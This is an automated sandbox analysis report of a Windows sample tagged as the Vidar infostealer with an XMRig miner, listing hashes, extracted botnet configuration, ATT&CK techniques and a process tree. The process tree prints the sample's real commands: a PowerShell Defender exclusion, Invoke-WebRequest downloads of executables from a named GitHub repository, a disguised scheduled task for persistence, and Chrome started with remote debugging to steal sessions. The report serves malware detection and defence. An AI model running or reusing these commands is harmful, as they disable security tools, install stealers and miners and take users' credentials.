vidar | 7c4aa4a2ab6b2a032881e90f13ddd38b675b0d3db391bfd1a60d55927a483587

Analysis

max time kernel
148s
max time network
149s
platform
windows11-21h2_x64
resource
win11-20250313-en
resource tags

arch:x64arch:x86image:win11-20250313-enlocale:en-usos:windows11-21h2-x64system
submitted
28/03/2025, 14:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

PokyBilsTGS.exe
Size

322KB
MD5

1b044fbca4a8963fb4ab17ab5ae7c2ef
SHA1

c234cc9b4dcb92fdd21ec71bae98745eaf43b7bd
SHA256

7c4aa4a2ab6b2a032881e90f13ddd38b675b0d3db391bfd1a60d55927a483587
SHA512

cf31978386764bb0fd8c12c32e3c354ead48dacbcffe035e07f2a40ba09a418033e47ecb1e79dfbe6dafe03676cb834f2281a8456b82e8e4a13b9ddfac9d6d00
SSDEEP

6144:GmQCJp3wv+eLkfCOuHejhurki9H/WUgCNxwsD7Gm:vHa+ekfxjhurv9eMksD6m

Score

10^/10

vidar xmrig 886e3178ef0cef21a6ff7125395660f2 credential_access defense_evasion discovery execution miner persistence spyware stealer upx

Malware Config

Extracted

Family

vidar

Version

13.3

Botnet

886e3178ef0cef21a6ff7125395660f2

https://t.me/lw25chm

https://steamcommunity.com/profiles/76561199839170361

Attributes

user_agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/132.0.0.0 Safari/537.36 OPR/117.0.0.0

Signatures

Detect Vidar Stealer 1 IoCs

stealer

resource	yara_rule
behavioral2/files/0x001b00000002b1ae-50.dat	family_vidar_v7

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
Vidar family
vidar
Xmrig family
xmrig
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/memory/5216-633-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-663-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-666-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-665-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-664-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-662-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-634-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-826-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig
behavioral2/memory/5216-827-0x0000000140000000-0x0000000140835000-memory.dmp	xmrig

Blocklisted process makes network request 6 IoCs

flow	pid	Process
2	3324	powershell.exe
3	5116	powershell.exe
4	3360	powershell.exe
5	5116	powershell.exe
6	3324	powershell.exe
7	3360	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Powershell Invoke Web Request.

execution

PowerShell

T1059.001

pid	Process
3324	powershell.exe
3360	powershell.exe
5116	powershell.exe
5636	powershell.exe
5924	powershell.exe
3532	powershell.exe

Creates new service(s) 2 TTPs
persistence execution

Windows Service
T1543.003

Service Execution
T1569.002

Drops file in Drivers directory 2 IoCs

description	ioc	Process
File created	C:\Windows\system32\drivers\etc\hosts	llttzcccf.exe
File created	C:\Windows\system32\drivers\etc\hosts	Updater.exe

Stops running service(s) 4 TTPs
defense_evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Uses browser remote debugging 2 TTPs 8 IoCs

Can be used control the browser and steal sensitive information such as credentials and session cookies.

credential_access stealer

Steal Web Session Cookie

T1539

Modify Authentication Process

T1556

pid	Process
5968	chrome.exe
2880	chrome.exe
1540	chrome.exe
3748	chrome.exe
2344	msedge.exe
1104	msedge.exe
4620	msedge.exe
5808	chrome.exe

Executes dropped EXE 5 IoCs

pid	Process
4492	pydvp.exe
4340	gganxacc.exe
2864	llttzcccf.exe
1604	service.exe
4936	Updater.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
credential_access stealer

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com
17	pastebin.com
1	raw.githubusercontent.com

Power Settings 1 TTPs 8 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

pid	Process
3892	powercfg.exe
4412	powercfg.exe
4260	powercfg.exe
5148	powercfg.exe
2020	powercfg.exe
2772	powercfg.exe
4976	powercfg.exe
6068	powercfg.exe

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\MRT.exe	llttzcccf.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\MRT.exe	Updater.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 4936 set thread context of 5288	4936	Updater.exe	180
PID 4936 set thread context of 5216	4936	Updater.exe	182

UPX packed file 14 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/5216-613-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-633-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-663-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-666-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-665-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-664-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-662-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-634-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-632-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-620-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-631-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-630-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-826-0x0000000140000000-0x0000000140835000-memory.dmp	upx
behavioral2/memory/5216-827-0x0000000140000000-0x0000000140835000-memory.dmp	upx

Drops file in Windows directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SystemTemp	chrome.exe
File opened for modification	C:\Windows\SystemTemp	msedge.exe

Launches sc.exe 14 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1612	sc.exe
3764	sc.exe
4412	sc.exe
2264	sc.exe
1012	sc.exe
4240	sc.exe
5848	sc.exe
3236	sc.exe
5056	sc.exe
5540	sc.exe
5916	sc.exe
2348	sc.exe
4660	sc.exe
1044	sc.exe

Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pydvp.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	gganxacc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	service.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	gganxacc.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	gganxacc.exe

Delays execution with timeout.exe 1 IoCs

defense_evasion

pid	Process
1436	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 48 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133876455636098479"	chrome.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2160	schtasks.exe
1020	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
5636	powershell.exe
5636	powershell.exe
3324	powershell.exe
5116	powershell.exe
3360	powershell.exe
3360	powershell.exe
5116	powershell.exe
3324	powershell.exe
4340	gganxacc.exe
4340	gganxacc.exe
4340	gganxacc.exe
4340	gganxacc.exe
5808	chrome.exe
5808	chrome.exe
4340	gganxacc.exe
4340	gganxacc.exe
2864	llttzcccf.exe
5924	powershell.exe
5924	powershell.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
2864	llttzcccf.exe
4936	Updater.exe
3532	powershell.exe
3532	powershell.exe
4340	gganxacc.exe
4340	gganxacc.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4936	Updater.exe
4340	gganxacc.exe
4340	gganxacc.exe
5216	explorer.exe
5216	explorer.exe
5216	explorer.exe
5216	explorer.exe
5216	explorer.exe
5216	explorer.exe
5216	explorer.exe
5216	explorer.exe
4340	gganxacc.exe
4340	gganxacc.exe
5216	explorer.exe
5216	explorer.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
2344	msedge.exe
2344	msedge.exe

Suspicious use of AdjustPrivilegeToken 37 IoCs

description	pid	Process
Token: SeDebugPrivilege	5636	powershell.exe
Token: SeDebugPrivilege	3324	powershell.exe
Token: SeDebugPrivilege	5116	powershell.exe
Token: SeDebugPrivilege	3360	powershell.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeShutdownPrivilege	5808	chrome.exe
Token: SeCreatePagefilePrivilege	5808	chrome.exe
Token: SeDebugPrivilege	5924	powershell.exe
Token: SeShutdownPrivilege	2772	powercfg.exe
Token: SeCreatePagefilePrivilege	2772	powercfg.exe
Token: SeShutdownPrivilege	2020	powercfg.exe
Token: SeCreatePagefilePrivilege	2020	powercfg.exe
Token: SeShutdownPrivilege	5148	powercfg.exe
Token: SeCreatePagefilePrivilege	5148	powercfg.exe
Token: SeShutdownPrivilege	4260	powercfg.exe
Token: SeCreatePagefilePrivilege	4260	powercfg.exe
Token: SeDebugPrivilege	3532	powershell.exe
Token: SeShutdownPrivilege	6068	powercfg.exe
Token: SeCreatePagefilePrivilege	6068	powercfg.exe
Token: SeShutdownPrivilege	4976	powercfg.exe
Token: SeCreatePagefilePrivilege	4976	powercfg.exe
Token: SeLockMemoryPrivilege	5216	explorer.exe
Token: SeShutdownPrivilege	3892	powercfg.exe
Token: SeCreatePagefilePrivilege	3892	powercfg.exe
Token: SeShutdownPrivilege	4412	powercfg.exe
Token: SeCreatePagefilePrivilege	4412	powercfg.exe

Suspicious use of FindShellTrayWindow 27 IoCs

pid	Process
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
5808	chrome.exe
2344	msedge.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1116 wrote to memory of 3860	1116	PokyBilsTGS.exe	84
PID 1116 wrote to memory of 3860	1116	PokyBilsTGS.exe	84
PID 3860 wrote to memory of 5636	3860	cmd.exe	85
PID 3860 wrote to memory of 5636	3860	cmd.exe	85
PID 1116 wrote to memory of 4920	1116	PokyBilsTGS.exe	86
PID 1116 wrote to memory of 4920	1116	PokyBilsTGS.exe	86
PID 1116 wrote to memory of 4928	1116	PokyBilsTGS.exe	88
PID 1116 wrote to memory of 4928	1116	PokyBilsTGS.exe	88
PID 1116 wrote to memory of 4708	1116	PokyBilsTGS.exe	87
PID 1116 wrote to memory of 4708	1116	PokyBilsTGS.exe	87
PID 4708 wrote to memory of 5116	4708	cmd.exe	89
PID 4708 wrote to memory of 5116	4708	cmd.exe	89
PID 4928 wrote to memory of 3360	4928	cmd.exe	90
PID 4928 wrote to memory of 3360	4928	cmd.exe	90
PID 4920 wrote to memory of 3324	4920	cmd.exe	91
PID 4920 wrote to memory of 3324	4920	cmd.exe	91
PID 1116 wrote to memory of 4492	1116	PokyBilsTGS.exe	92
PID 1116 wrote to memory of 4492	1116	PokyBilsTGS.exe	92
PID 1116 wrote to memory of 4492	1116	PokyBilsTGS.exe	92
PID 1116 wrote to memory of 4340	1116	PokyBilsTGS.exe	93
PID 1116 wrote to memory of 4340	1116	PokyBilsTGS.exe	93
PID 1116 wrote to memory of 4340	1116	PokyBilsTGS.exe	93
PID 4492 wrote to memory of 4300	4492	pydvp.exe	94
PID 4492 wrote to memory of 4300	4492	pydvp.exe	94
PID 4492 wrote to memory of 4300	4492	pydvp.exe	94
PID 4300 wrote to memory of 2160	4300	cmd.exe	96
PID 4300 wrote to memory of 2160	4300	cmd.exe	96
PID 4300 wrote to memory of 2160	4300	cmd.exe	96
PID 1116 wrote to memory of 2864	1116	PokyBilsTGS.exe	97
PID 1116 wrote to memory of 2864	1116	PokyBilsTGS.exe	97
PID 4340 wrote to memory of 5808	4340	gganxacc.exe	98
PID 4340 wrote to memory of 5808	4340	gganxacc.exe	98
PID 5808 wrote to memory of 236	5808	chrome.exe	99
PID 5808 wrote to memory of 236	5808	chrome.exe	99
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100
PID 5808 wrote to memory of 1352	5808	chrome.exe	100

C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe
"C:\Users\Admin\AppData\Local\Temp\PokyBilsTGS.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\wzioof', 'C:\Users', 'C:\ProgramData'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3860
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\wzioof', 'C:\Users', 'C:\ProgramData'"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4920
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/nbotpasppp.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3324
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\pydvp.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4708
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/tkskfaaa.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\pydvp.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe'"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -Command "Invoke-WebRequest -Uri 'https://github.com/diperkla/deljack/raw/refs/heads/main/gfdthawdddd.exe' -OutFile 'C:\Users\Admin\AppData\Local\wzioof\llttzcccf.exe'"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:3360
- C:\Users\Admin\AppData\Local\wzioof\pydvp.exe
  "C:\Users\Admin\AppData\Local\wzioof\pydvp.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:4492
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /C schtasks /create /tn GoogleUpdaterex /tr %APPDATA%\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4300
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn GoogleUpdaterex /tr C:\Users\Admin\AppData\Roaming\service.exe /st 00:00 /du 9999:59 /sc daily /ri 1 /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2160
- C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe
  "C:\Users\Admin\AppData\Local\wzioof\gganxacc.exe"
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4340
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    3⤵
    - Uses browser remote debugging
    - Drops file in Windows directory
    - Enumerates system info in registry
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of WriteProcessMemory
    PID:5808
  - - C:\Program Files\Google\Chrome\Application\chrome.exe
